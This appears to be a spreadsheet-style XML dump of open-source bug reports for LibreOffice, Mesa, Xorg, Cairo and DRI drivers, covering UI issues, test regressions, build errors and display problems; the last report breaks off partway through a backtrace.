    <t>LIBREOFFICE-48240</t>
  </si>
  <si>
    <t>EDITING: Autocompletition active in parenthesis as well when editing formula</t>
  </si>
  <si>
    <t>Problem description: 
Autocompletition active in parenthesis as well when editing formula which is slightly annoying.
Steps to reproduce:
1. Type =whatever value  to a cell
2. go left one character type l and press enter
3. autocompletition kicks in and you have =whatever value LOOKUP()
Expected behavior:
Autocompletition suggests function names only when outside of parenthesis.
Platform (if different from the browser): 
Browser: Mozilla/5.0 (X11 Ubuntu Linux x86_64 rv:11.0) Gecko/20100101 Firefox/11.0</t>
  </si>
  <si>
    <t>mahfiaz</t>
  </si>
  <si>
    <t>MESA-76753</t>
  </si>
  <si>
    <t>[swrast] piglit arb_clear_buffer_object-formats regression</t>
  </si>
  <si>
    <t>mesa: 4047263cb15e89d23cb145c74fb3f303904e8f14 (master 10.2.0-devel)
$ ./bin/arb_clear_buffer_object-formats -auto
Testing GL_ALPHA8... Passed.
Testing GL_ALPHA16... Passed.
Testing GL_LUMINANCE8... Passed.
Testing GL_LUMINANCE16... Passed.
Testing GL_LUMINANCE8_ALPHA8... Passed.
Testing GL_LUMINANCE16_ALPHA16... Passed.
Testing GL_INTENSITY8... Passed.
Testing GL_INTENSITY16... Passed.
Testing GL_RGBA8... Passed.
Testing GL_RGBA16... Passed.
Testing GL_ALPHA32F_ARB... Passed.
Testing GL_LUMINANCE32F_ARB... Passed.
Testing GL_LUMINANCE_ALPHA32F_ARB... Passed.
Testing GL_INTENSITY32F_ARB... Passed.
Testing GL_RGBA32F... Passed.
Testing GL_ALPHA16F_ARB... Passed.
Testing GL_LUMINANCE16F_ARB... Passed.
Testing GL_LUMINANCE_ALPHA16F_ARB... Passed.
Testing GL_INTENSITY16F_ARB... Failed!
Testing GL_RGBA16F... Passed.
Testing GL_R8... Passed.
Testing GL_R16... Passed.
Testing GL_R16F... Passed.
Testing GL_R32F... Passed.
Testing GL_RG8... Passed.
Testing GL_RG16... Passed.
Testing GL_RG16F... Passed.
Testing GL_RG32F... Passed.
PIGLIT: {'result': 'fail' }
4002daf09545f321a070d0ead06324be11331553 is the first bad commit
commit 4002daf09545f321a070d0ead06324be11331553
Author: Chris Forbes 
Date:   Wed Mar 26 10:03:38 2014 +1300
    Revert mesa: Fix format matching checks for GL_INTENSITY* internalformats.
    This reverts commit 40d7b5195351d3e4199e7a840615a595a6dbaefc.
:040000 040000 bce2d8c961eb8680545dfcb6093d5fa0c8f84a4a e2afe16a16934d9b296972dae22d12fc980ecaae M	src
bisect run success</t>
  </si>
  <si>
    <t>PIGLIT-108537</t>
  </si>
  <si>
    <t>The fs-frexp-dvec4-only-exponent.shader_test test fails</t>
  </si>
  <si>
    <t>I guess that test fs-frexp-dvec4-only-exponent.shader_test has the incorrect expected values that is why it fails.
I will send patch shortly.</t>
  </si>
  <si>
    <t>XORG-28080</t>
  </si>
  <si>
    <t>glresize causes X server segfault with indirect rendering.</t>
  </si>
  <si>
    <t>Created attachment 35604
Xorg.0.log including backtrace.
This was originally described in bug 27922 and occurs when running the
glresize test program there which creates an OpenGL window and then rapidly
resizes it switching back and forth between filling the entire screen and its
original size.
Running glresize with LIBGL_ALWAYS_INDIRECT=1 causes the server to immediately segfault.  This occurs with (at least) servers 1.8.0 and git master.  I'm using mesa 7.8.1.
The system is a ThinkPad T500 with a GM45 running git xf86-video-intel but it also occurs with 2.11.0.</t>
  </si>
  <si>
    <t>LIBREOFFICE-76203</t>
  </si>
  <si>
    <t>UI: Missing title case in a few dialogs</t>
  </si>
  <si>
    <t>(US) English Language UI Settings LO 4.2.1.1 Win 8.1
Problem Description:
In LO we are using for the main titles and headlines of the dialogs the title case (capitalise significant/longer words) instead of the sentence case (capitalisation follows the same rules that apply for sentences: e.g. first word starting with capital letter and then going on with small letters).
I personally also would prefer that title case for the menus and dialogs of LO but only for the main titles and headlines.
Note: You can see the title case writing for instance if you take a look at menus in the menu VIEW.
But I found there some dialogs where there are items not in this title case systematics if we want to follow that (see list below).
Does anybody has any objections comments or corrections to my comment?
Issues:
FILE -&gt; EXPORT AS PDF -&gt; tab GENERAL: Signs with [w]atermark Watermark [t]ext View PDF after [e]xport
FILE -&gt; EXPORT AS PDF -&gt; tab INITIAL VIEW: Page [L]ayout
FILE -&gt; EXPORT AS PDF -&gt; tab USER INTERFACE: Window [O]ptions User [I]nterface [O]ptions
FILE -&gt; EXPORT AS PDF -&gt; tab LINKS: Cross-document [L]inks
FILE -&gt; EXPORT AS PDF -&gt; tab SECURITY: File [E]ncryption and [P]ermission
FILE -&gt; PROPERTIES -&gt; tab SECURITY: File [S]haring [O]ptions
EDIT -&gt; AUTOTEXT: Save [L]inks [R]elative to
EDIT -&gt; EXCHANGE DATABASE: Exchange [D]atabase 
VIEW -&gt; ZOOM: Optimal [V]iew
VIEW -&gt; ZOOM -&gt; ZOOM...: Zoom [F]actor View [L]ayout
INSERT -&gt; SECTION -&gt; tab SECTION: New [S]ection Write [P]rotection With [c]ondition 
INSERT -&gt; SECTION -&gt; tab COLUMNS: Separator [L]ine
INSERT -&gt; SECTION -&gt; tab BACKGROUND: Background [C]olor
INSERT -&gt; HYPERLINK: Here the subtitles have a different format (not bold and with a line following).  Should this stay that way because this is different to other menus in the LO dialogs?  I suppose that these dialogs have still to be converted to the .ui dialog form?
INSERT -&gt; CROSS-REFERENCE -&gt; tab CROSS-REFERENCES: Insert [R]eference to
INSERT -&gt; CROSS-REFERENCE -&gt; tab DATABASE: Database [S]election
INSERT -&gt; ENVELOPE -&gt; tab PRINTER: Envelop [O]rientation
INSERT -&gt; FRAME -&gt; tab HYPERLINK: Image [M]ap
INSERT -&gt; FRAME -&gt; tab BORDERS: Line [A]rrangement Spacing to [C]ontents Shadow [S]tyle
INSERT -&gt; FRAME -&gt; tab BACKGROUND: Background [C]olor
INSERT -&gt; FRAME -&gt; tab COLUMNS: Separator [L]ine
INSERT -&gt; OBJECT -&gt; OLE OBJECT: Object [T]ype
INSERT -&gt; FLOATING FRAME: Scroll [B]ar Spacing to [C]ontents
FORMAT -&gt; CHARACTER -&gt; tab FONT EFFECTS: Underline [c]olor
FORMAT -&gt; CHARACTER -&gt; tab HYPERLINK: Character [S]tyles
FORMAT -&gt; CHARACTER -&gt; tab BACKGROUND: Background [C]olor
FORMAT -&gt; CHARACTER -&gt; tab BORDERS: Line [A]rrangement Spacing to [C]ontents Shadow [S]tyle
FORMAT -&gt; PARAGRAPH -&gt; tab OUTLINE &amp; NUMBERING: Line [N]umbering
FORMAT -&gt; PARAGRAPH -&gt; tab TABS: Fill [C]haracter
FORMAT -&gt; PARAGRAPH -&gt; tab BORDERS: Line [A]rrangement Spacing to [C]ontents Shadow [S]tyle
FORMAT -&gt; CHARACTER -&gt; tab BACKGROUND: Background [C]olor
FORMAT -&gt; CHARACTER -&gt; tab INDENTS &amp; SPACING: Line [S]pacing
FORMAT -&gt; BULLETS &amp; NUMBERING: Numbering [T]ype
FORMAT -&gt; BULLETS &amp; NUMBERING -&gt; tab Position: Position and [S]pacing Numbering [a]lignment
FORMAT -&gt; PAGE -&gt; tab ORGANIZER: Next [s]tyle
FORMAT -&gt; PAGE -&gt; tab PAGE: Paper [F]ormat Layout [S]ettings
FORMAT -&gt; PAGE -&gt; tab BACKGROUND: Background [C]olor
FORMAT -&gt; PAGE -&gt; tab BORDERS: Line [A]rrangement Spacing to [C]ontents Shadow [S]tyle
FORMAT -&gt; PAGE -&gt; tab COLUMNS: Separator [L]ine
FORMAT -&gt; PAGE -&gt; tab FOOTNOTE: Footnote [A]rea Separator [L]ine
FORMAT -&gt; COLUMNS: Separator [L]ine
TABLE -&gt; INSERT -&gt; TABLE -&gt; OPTIONS: Repeat [h]eading [r]ows on new pages Heading [r]ows
TABLE: Heading [R]ows [R]epeat
TABLE -&gt; CONVERT -&gt; TABLE TO TEXT: Separate [T]ext at
TABLE -&gt; SORT: Sort [C]riteria
TABLE -&gt; NUMBER FORMAT: Format [C]ode
TABLE -&gt; TABLE PROPERTIES -&gt; tab COLUMNS: Column [W]idth 
TABLE -&gt; TABLE PROPERTIES -&gt; tab BORDERS: Lne [A]rrangement Spacing to [C]ontents Shadow [S]tyle
TABLE -&gt; TABLE PROPERTIES -&gt; tab BACKGROUND: Background [C]olor
TOOLS -&gt; SPELLING AND GRAMMAR: Always [C]orrect
TOOLS -&gt; FOOTNOTES/ENDNOTES: Continuation [N]otice
TOOLS -&gt; EXTENSION MANAGER: Check for [U]pdates
TOOLS -&gt; CUSTOMIZE -&gt; tab KEYBOARD: Shortcut [K]eys 
TOOLS -&gt; CUSTOMIZE -&gt; tab TOOLSBARS: Save [i]n 
TOOLS -&gt; CUSTOMIZE -&gt; tab TOOLSBARS -&gt; Arrow at the TOOLBAR button: Text [O]nly
TOOLS -&gt; CUSTOMIZE -&gt; tab EVENTS: Save [i]n 
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE -&gt; GENERAL: Open/Save [D]ialogs Document [S]tatus YEAR ([T]wo [D]igits)
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE -&gt; MEMORY: Graphics [C]ache Cache for [I]nserted [O]bjects
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE -&gt; VIEW: Graphics [O]utput 
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE -&gt; PRINT: Reduce [P]rint [D]ata Printer [W]arnings
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE -&gt; FONTS: Replacement [T]able Font [S]ettings for HTML Basic and SQL [S]ources
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE -&gt; SECURITY: Security [O]ptions and [W]arnings Passwords for [W]eb [C]onnections Macro [S]ecurity
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE -&gt; APPEARANCE: Color [S]cheme Custom [C]olors
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE -&gt; ACCESSIBILITY: Miscellaneous [O]ptions Options for [H]igh [C]ontrast [A]ppearance
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE -&gt; ADVANCED: Java [O]ptions Optional ([U]nstable) [O]ptions
TOOLS -&gt; OPTIONS -&gt; LOAD/SAVE -&gt; GENERAL: Default [F]ile [F]ormat and ODF [S]ettings 
TOOLS -&gt; OPTIONS -&gt; LOAD/SAVE -&gt; MICROSOFT OFFICE: Embedded [O]bjects
TOOLS -&gt; OPTIONS -&gt; LOAD/SAVE -&gt; HTML COMPATIBILITY: Font [S]izes  
TOOLS -&gt; OPTIONS -&gt; LANGUAGE SETTINGS -&gt; LANGUAGES: Default [L]anguages for [D]ocuments Enhanced [L]anguage [S]upport
TOOLS -&gt; OPTIONS -&gt; LANGUAGE SETTINGS -&gt; WRITING AIDS: Writing [A]ids 
TOOLS -&gt; OPTIONS -&gt; LANGUAGE SETTINGS: English [S]entence [C]hecking: Here the subtitles have a different format (not bold and with a line following).  Should this stay that way because this is different to other menus in this Options dialog?
TOOLS -&gt; OPTIONS -&gt; LANGUAGE SETTINGS: Grammar [C]hecking (Russian): The same situation as above.
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER -&gt; GENERAL: Update [L]inks when [L]oading
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER -&gt; FORMATTING AIDS: Direct [Cu]rsor Layout [A]ssistance Cursor in [P]rotected [A]reas
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER -&gt; BASIC FONTS (WESTERN): Basic [F]onts (Western)
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER -&gt; TABLE: Keyboard [H]andling Input in [T]ables
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER -&gt; CHANGES: Text [D]isplay
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER -&gt; COMPARISON: Compare [D]ocuments
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER -&gt; COMPATIBILITY: Compatibility [O]ptions for ...
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER -&gt; AUTOCAPTION: Add [C]aptions [A]utomatically when [I]nserting Caption [O]rder
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER -&gt; MAIL MERGE E-MAIL: User [I]nformation Outgoing [S]erver (SMTP) Settings
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER/WEB -&gt; VIEW -&gt; GUIDE: Helplines [w]hile [m]oving
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER/WEB -&gt; FORMATTING AIDS: Layout [A]ssistance
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER/WEB -&gt; TABLE: Input in [T]able Keyboard [H]andling
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE WRITER/WEB -&gt; BACKGROUND: Background [C]olor
TOOLS -&gt; OPTIONS -&gt; LIBREOFFICE BASE -&gt; DATABASES: Registered [D]atabases
TOOLS -&gt; OPTIONS -&gt; CHART -&gt; DEFAULT COLORS: Chart [C]olors</t>
  </si>
  <si>
    <t>CAIRO-2763</t>
  </si>
  <si>
    <t>libcairo_freetype_sources not defined in Makefile.am</t>
  </si>
  <si>
    <t>Solaris 10 x86 with Sun ONE Studio 8 compiler
libcairo_freetype_sources is not defined but is referenced in Makefile.am.
Attached patch removes reference.</t>
  </si>
  <si>
    <t>XORG-20683</t>
  </si>
  <si>
    <t>[865] UXA hangs X upon startup.</t>
  </si>
  <si>
    <t>Created attachment 23909
Xorg.log of hung X
GPU: 00:02.0 VGA compatible controller: Intel Corporation 82865G Integrated Graphics Controller (rev 02)
OS: Gentoo linux
x-server: 1.6
Kernel: 2.6.29-rc8-git
Have tried various combinations and permutations of suggestions that I've found both on freedesktop and on gentoos bugzilla but so far nothing has worked. (kernels KMS/FB on/off AGP aperture tiling legacy3d and more)
Thus far I have been unable to get a working X with UXA enabled only with XAA.
Symptom: at some stage (usually just as desktop appears but before icons are displayed) the display hangs keyboard input is disabled and the only movement on screen comes from mouse. Do not believe HAL is culprit as works fine with XAA enabled.
Cannot change to a different tty. 
Can ssh in sysrq keys do work.
No error messages appear in logs that appear relevant... although occasionally xfce4-mixer-plugin will segfault. As this also intermittently occurs when using XAA I'm confident it is unrelated.
Have attached Xorg.0.log but have not found anything that appears to point to a solution as yet. Am happy to post anything else that may be required.</t>
  </si>
  <si>
    <t>scotthanson80</t>
  </si>
  <si>
    <t>DRI-109375</t>
  </si>
  <si>
    <t>Regression: dark notebook display (no backlight) after resume</t>
  </si>
  <si>
    <t>I use HP EliteBook 745 G5 with Ryzen 5 PRO 2500U.
Starting with the:
commit 262485a50fd4532a8d71165190adc7a0a19bcc9e (refs/bisect/bad)
Author: Anthony Koo 
Date:   Fri Oct 12 21:34:32 2018 -0400
    drm/amd/display: Expand dc to use 16.16 bit backlight
    [Why] We want to increase precision for backlight setting.
    But DC interface takes 8 bit backlight level value only.
    [How] DMCU already takes 16 bit backlight level.
    Expand the DC interface to take 16.16 bit value.
    Max 32 bit backlight value (0xFFFF) will represent
    max backlight (100%)
    Signed-off-by: Anthony Koo 
    Reviewed-by: Tony Cheng 
    Acked-by: Leo Li 
    Signed-off-by: Alex Deucher 
After resume from RAM my notebook display is all black.
Before suspend:
&gt; cat /sys/class/backlight/amdgpu_bl0/{actual_brightnessbrightness}
65535
255
After resume:
&gt; cat /sys/class/backlight/amdgpu_bl0/{actual_brightnessbrightness}
0
255
This can be workarounded by:
echo 255 &gt; /sys/class/backlight/amdgpu_bl0/brightness
assuming one can execute that without a working display.
This problem still exists in the 5.0.0-rc2.</t>
  </si>
  <si>
    <t>LIBREOFFICE-59193</t>
  </si>
  <si>
    <t>automatic row height does not work after import</t>
  </si>
  <si>
    <t>Problem description: 
Function opimal Row Hight doesn't work in spreadsheets created in previous versions of LO.
Steps to reproduce:
1. Open a spreadsheet created in an older version of LibreOffice and containing a cell with several lines of text
2. Delete the whole content of the cell
Current behavior:
The row hight of this cell does not change automatically. Double clicking on the line between row numbers doesn't work either. The row hight can only be set manually.
Expected behavior:
The row hight of this cell should be reseted to default size. Double clicking on the line between the row numbers or clicking on Format&gt;Row&gt;Optimal Hight should change the row hight to the optimal size.
The problem does not affect spreadsheets created in current version(4.0)of LibreOffice
Operating System: Ubuntu
Version: 4.0.0.0.beta2
Last worked in: 3.6.4.3 release</t>
  </si>
  <si>
    <t>pkaplon</t>
  </si>
  <si>
    <t>XORG-2773</t>
  </si>
  <si>
    <t>[PATCH] Linux/sparc64 (64bit userland) fixes for xorg-x11</t>
  </si>
  <si>
    <t>Trying to build X in 64bit is proving to be a bit difficult... I think this
might be more of a toolchain problem as I've found a workaround... I just wanted
to report here in case others come across the issue or you already know of a
better fix...
sparc64-unknown-linux-gnu-gcc -c -x assembler-with-cpp -Wa-Av9a VISmoveImage.s
-o VISmoveImage.o
VISmoveImage.s: Assembler messages:
VISmoveImage.s:207: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:233: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:240: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:244: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:244: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:246: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:246: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:250: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:250: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:252: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:252: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:257: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:257: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:257: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:262: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:263: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:270: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:726: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:918: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:918: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:918: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:918: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:918: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:918: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:922: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:923: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:928: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:980: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:980: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:983: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:983: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:986: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:986: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:990: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:990: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:994: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:994: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:999: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:999: Error: detected global register use not covered by .register
pseudo-op
VISmoveImage.s:1004: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1004: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1010: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1010: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1016: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1016: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1023: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1023: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1030: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1030: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1038: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1038: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1046: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1046: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1055: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1055: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1064: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1064: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1074: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1074: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1093: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1094: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1095: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1096: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1097: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1098: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1099: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1100: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1101: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1102: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1103: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1104: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1105: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1106: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1107: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1108: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1175: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1201: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1210: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1214: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1214: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1220: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1220: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1222: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1222: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1224: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1224: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1224: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1226: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1228: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:1238: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2117: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2324: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2324: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2324: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2324: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2324: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2324: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2338: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2339: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2344: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2398: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2407: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2418: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2427: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2438: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2446: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2457: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2465: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2476: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2483: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2494: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2501: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2512: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2518: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2529: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2535: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2546: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2553: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2564: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2571: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2582: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2590: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2601: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2609: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2620: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2629: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2640: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2649: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2660: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2663: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2673: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2676: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2695: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2696: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2697: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2698: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2699: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2700: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2701: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2702: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2703: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2704: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2705: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2706: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2707: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2708: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2709: Error: detected global register use not covered by
.register pseudo-op
VISmoveImage.s:2710: Error: detected global register use not covered by
.register pseudo-op
make[7]: *** [VISmoveImage.o] Error 1
make[7]: Leaving directory
`/usr/tmp/portage/xorg-x11-6.8.2-r1/work/xc/programs/Xserver/hw/xfree86/drivers/sunffb'
make[6]: *** [all] Error 2
make[6]: Leaving directory
`/usr/tmp/portage/xorg-x11-6.8.2-r1/work/xc/programs/Xserver/hw/xfree86/drivers'
make[5]: *** [all] Error 2
make[5]: Leaving directory
`/usr/tmp/portage/xorg-x11-6.8.2-r1/work/xc/programs/Xserver/hw/xfree86'
make[4]: *** [hw/xfree86] Error 2
make[4]: Leaving directory
`/usr/tmp/portage/xorg-x11-6.8.2-r1/work/xc/programs/Xserver'
make[3]: *** [all] Error 2
make[3]: Leaving directory `/usr/tmp/portage/xorg-x11-6.8.2-r1/work/xc/programs'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/usr/tmp/portage/xorg-x11-6.8.2-r1/work/xc'
make[1]: *** [World] Error 2
make[1]: Leaving directory `/usr/tmp/portage/xorg-x11-6.8.2-r1/work/xc'
make: *** [World] Error 2
I'll attach the CPP output achieved via
sparc64-unknown-linux-gnu-gcc -E -c -x assembler-with-cpp -Wa-Av9a
VISmoveImage.s -o VISmoveImageCPP.s
But I get no errors when I try assembling that with:
sparc64-unknown-linux-gnu-as -Av9a VISmoveImageCPP.s -o VISmoveImage.o
This also happens with assembly in Mesa and other ffb assembly code</t>
  </si>
  <si>
    <t>DRI-23357</t>
  </si>
  <si>
    <t>[GL40]  [i686]  KMS black screen with kernel 2.6.30</t>
  </si>
  <si>
    <t>On HP Montenvia based prototype laptop KMS shows black screen. 
System environment:
-- chipset:  GL40
-- system architecture: i686
-- xf86-video-intel:  2.7.0
-- xserver: 1.5.1
-- mesa:
-- libdrm:  2.4.12
-- kernel:  2.6.30
-- Linux distribution:  Red Flag 6.1
-- Machine or mobo model:  N/A prototype system
-- Display connector: LVDS
Kernel config:
         CONFIG_FRAMEBUFFER_CONSOLE = y
Reproducing steps:
1. If system boots with VGA=788 both VT &amp; X gives a black screen. Note that although screen is black system is active. I can blindly switch between VT and X or among VTs.  So I blindly switch to a VT log in and then cat /proc/fb  to a file  it gets:
 0 VESA VGA
 1 inteldrmfb
2. Without VGA=788 after booting up VT can display cat /proc/fb gets:
    0 inteldrmfb
In this case the screen turns into black on both VT and X once starting X.
3. I tried to attach an extra VGA monitor to the laptop and black screen as well.
4. Disable X starting in init_level 5 with VGA=788 after booting up Screen is black. Try to adjust backlight via sys interface doesn't work.  Now if ssh to
the system and then startx we can get the stack:
(--) TouchPad touchpad found
(II) Mouse: Setting mouse protocol to ExplorerPS/2
(II) Mouse: ps2EnableDataReporting: succeeded
Backtrace:
0: X(xf86SigHandler+0x79) [0x80b8ca9]
1: [0xffffe400]
